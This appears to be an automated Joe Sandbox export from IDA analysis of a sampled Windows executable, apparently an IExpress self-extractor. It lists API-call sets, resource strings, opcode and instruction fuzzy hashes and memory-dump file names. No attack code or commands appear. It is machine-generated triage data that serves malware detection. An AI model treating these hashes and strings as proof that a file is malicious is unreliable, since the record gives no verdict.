                                                                                                                      • Opcode Fuzzy Hash: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                                                                      • Instruction Fuzzy Hash: EA312F7590A643C6E715AF24B80C2F4EBA1FB8AF61FD49230E91E06394CFBCA045C720
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2168512254-0
                                                                                                                      • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                      • Instruction ID: 211b6db5f3d2ba98040709804fd39db141ff88c58226352da3a4dec34b421899
                                                                                                                      • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                      • Instruction Fuzzy Hash: A5514D32609A42CAE720AF21F4581E9BBB4FB4EF98F815135EA0E53754DF78D454CB10
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                      • API String ID: 3346862599-1109908249
                                                                                                                      • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                      • Instruction ID: 5ecab1a02e30d2e75b7983160f97fe22ce4a9441383d7a2c04609b9a2f391341
                                                                                                                      • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                      • Instruction Fuzzy Hash: DA518236A0AA82CAEB119B24F4481F9F7A1FB89F60F854135EA5D03794DFBCE544CB10
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1051330783-0
                                                                                                                      • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                      • Instruction ID: 86a59971418db72a5c069f2b647545792e23b38a7e4a6e47ade531363ece0334
                                                                                                                      • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                      • Instruction Fuzzy Hash: 37518732A06642CAEB10AF25B4085F8B7B5FB48F94F985135EE0E63794DF79E441C720
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 975904313-0
                                                                                                                      • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                      • Instruction ID: 6ddf73c0629b032ee73a4a0953e1ac2e47475dfdde82eefd3ea47c5a1824ec9c
                                                                                                                      • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                      • Instruction Fuzzy Hash: 13519461A0E6C5C5FB216F35B4183F8EB91EB49FA0F888171EA8E06785CE7DD4458720
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75078
                                                                                                                        • Part of subcall function 00007FF761F75050: SizeofResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75089
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750AF
                                                                                                                        • Part of subcall function 00007FF761F75050: LoadResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750C0
                                                                                                                        • Part of subcall function 00007FF761F75050: LockResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750CF
                                                                                                                        • Part of subcall function 00007FF761F75050: memcpy_s.MSVCRT ref: 00007FF761F750EE
                                                                                                                        • Part of subcall function 00007FF761F75050: FreeResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750FD
                                                                                                                      • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF761F73139), ref: 00007FF761F73F95
                                                                                                                      • LocalFree.KERNEL32 ref: 00007FF761F74018
                                                                                                                        • Part of subcall function 00007FF761F74DCC: LoadStringA.USER32 ref: 00007FF761F74E60
                                                                                                                        • Part of subcall function 00007FF761F74DCC: MessageBoxA.USER32 ref: 00007FF761F74EA0
                                                                                                                        • Part of subcall function 00007FF761F77700: GetLastError.KERNEL32 ref: 00007FF761F77704
                                                                                                                      • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF761F73139), ref: 00007FF761F7403E
                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00007FF761F73139), ref: 00007FF761F7409F
                                                                                                                        • Part of subcall function 00007FF761F77AC8: FindResourceA.KERNEL32 ref: 00007FF761F77AF2
                                                                                                                        • Part of subcall function 00007FF761F77AC8: LoadResource.KERNEL32 ref: 00007FF761F77B09
                                                                                                                        • Part of subcall function 00007FF761F77AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF761F77B3F
                                                                                                                        • Part of subcall function 00007FF761F77AC8: FreeResource.KERNEL32 ref: 00007FF761F77B51
                                                                                                                      • LocalFree.KERNEL32 ref: 00007FF761F74078
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                      • Opcode ID: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                                                                      • Instruction ID: 74f30dbc132df95bd53e1a8de8bfbec3200d6704abd715808380c52fddfc5ef8
                                                                                                                      • Opcode Fuzzy Hash: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                                                                      • Instruction Fuzzy Hash: EB312C31A2A602C6F721BB20F8197F9B760FB85F95FC05139E94D46694DFBDE0058720
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F7114C: _vsnprintf.MSVCRT ref: 00007FF761F71189
                                                                                                                      • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F77763
                                                                                                                      • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F77772
                                                                                                                      • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F777B8
                                                                                                                      • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F777EC
                                                                                                                      • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF761F7606F), ref: 00007FF761F77805
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                      • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                      • Instruction ID: 4b114a6f5f0447206b0c728c9a34974c271f08d1d201791229d0936c684f83fa
                                                                                                                      • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                                      • Instruction Fuzzy Hash: 8A319132A1AA42C6E750AB21F4081F9FBA0FB89F50F959235EA5E07794CFBCE005C710
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3370778649-0
                                                                                                                      • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                      • Instruction ID: ee4376f2b8cc9b966d680b7fe3df49e4c6420448754df68ad15faa5651489aa7
                                                                                                                      • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                                      • Instruction Fuzzy Hash: 2C11172170AB81C7EB546B62B8480B9FBA0FB4EFD1B899138EE0E43754DE7CD4458710
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                      • String ID: wininit.ini
                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                      • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                      • Instruction ID: f5a1d48994ed6bfb0f45f33acbafa701b00ef7ef775c3b3bb0f41a9c8c168229
                                                                                                                      • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                                      • Instruction Fuzzy Hash: 78115C32A05A81C7E720AB21F8482E9B7A1FBCDB14F858235EA4E42664DE7CD509CB00
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                      • String ID: Adv
                                                                                                                      • API String ID: 761066910-921584719
                                                                                                                      • Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                                                                      • Instruction ID: fee774ca8c2bea743141f5329871793627e92d458dd0701f527ccfd3f3428ce8
                                                                                                                      • Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                                                                      • Instruction Fuzzy Hash: D911FE72D0A642D6F754BB55B80C2F8EBA1FB8AF51FD49130E90E16394CEBCA444C720
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75078
                                                                                                                        • Part of subcall function 00007FF761F75050: SizeofResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75089
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750AF
                                                                                                                        • Part of subcall function 00007FF761F75050: LoadResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750C0
                                                                                                                        • Part of subcall function 00007FF761F75050: LockResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750CF
                                                                                                                        • Part of subcall function 00007FF761F75050: memcpy_s.MSVCRT ref: 00007FF761F750EE
                                                                                                                        • Part of subcall function 00007FF761F75050: FreeResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750FD
                                                                                                                      • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF761F73388), ref: 00007FF761F74975
                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF761F73388), ref: 00007FF761F74A11
                                                                                                                        • Part of subcall function 00007FF761F74DCC: LoadStringA.USER32 ref: 00007FF761F74E60
                                                                                                                        • Part of subcall function 00007FF761F74DCC: MessageBoxA.USER32 ref: 00007FF761F74EA0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                      • String ID: <None>$@$FINISHMSG
                                                                                                                      • API String ID: 3507850446-4126004490
                                                                                                                      • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                      • Instruction ID: 0e47c29c7cf33b9279ca14b68bcac25cf426a4978a2f0c6bf572d16e7f8d7d97
                                                                                                                      • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                      • Instruction Fuzzy Hash: 2E118472A09642C7F720BB20F4597FAF7A1FB89B54F84A134EA4E42694DFBCD0048B14
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                      • API String ID: 438848745-3680919256
                                                                                                                      • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                      • Instruction ID: e28befb2c00f816b091f870601cb6981e9eae3dbc028820e06df25e6c923b388
                                                                                                                      • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                      • Instruction Fuzzy Hash: 17116F31A1A682C5FB21BB14F4482F9B7A0FB89F14FC41231E54D426A1CF7DD60AC710
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1273765764-0
                                                                                                                      • Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                                                      • Instruction ID: 2b0743822b69b65831fb0a50fec03d43d705eeda8c56f5369c45898a9717f2a3
                                                                                                                      • Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                                                      • Instruction Fuzzy Hash: 0B116021A09A86C6EB606B14B41C3F9F7A1FBC9F64F844231EA5E063D5CFBCD1458750
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                                                                      • String ID: Adv
                                                                                                                      • API String ID: 2312377310-921584719
                                                                                                                      • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                      • Instruction ID: 61973a2937fcb746734d0d8d27906051ced1ab4f9b4e712fbdb98fadb6da4351
                                                                                                                      • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                      • Instruction Fuzzy Hash: 7DA18F32A1B252E6F764EB11B44C6F9E7A4BB44B94F95013AF94D83284CFBDE845C720
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                      • API String ID: 1065093856-305352358
                                                                                                                      • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                      • Instruction ID: 10adbdc5e1a60e0d449fe2bd324656b508ed4115a7d96213b0143865853fb3d7
                                                                                                                      • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                      • Instruction Fuzzy Hash: 5731617261A681C6EB51AF10F4487E9F760FB89BA4F844235EA9D47794CFBCD408C710
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *MEMCAB
                                                                                                                      • API String ID: 0-3211172518
                                                                                                                      • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                      • Instruction ID: 28b9a5eed7ec3668b6d52141339b093cab0bb8a419c796fe7a7d4d3a6b0ee1f2
                                                                                                                      • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                      • Instruction Fuzzy Hash: 12311A31A0AB42C5EB50AB11F45C3F9B7A2FB48B90FD54236E95D462A0DFBCE446C720
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 140117192-0
                                                                                                                      • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                      • Instruction ID: b3930767550f72b2bab4ab4e0d64708fbee892cbcf6200754e68afcf70c33b4c
                                                                                                                      • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
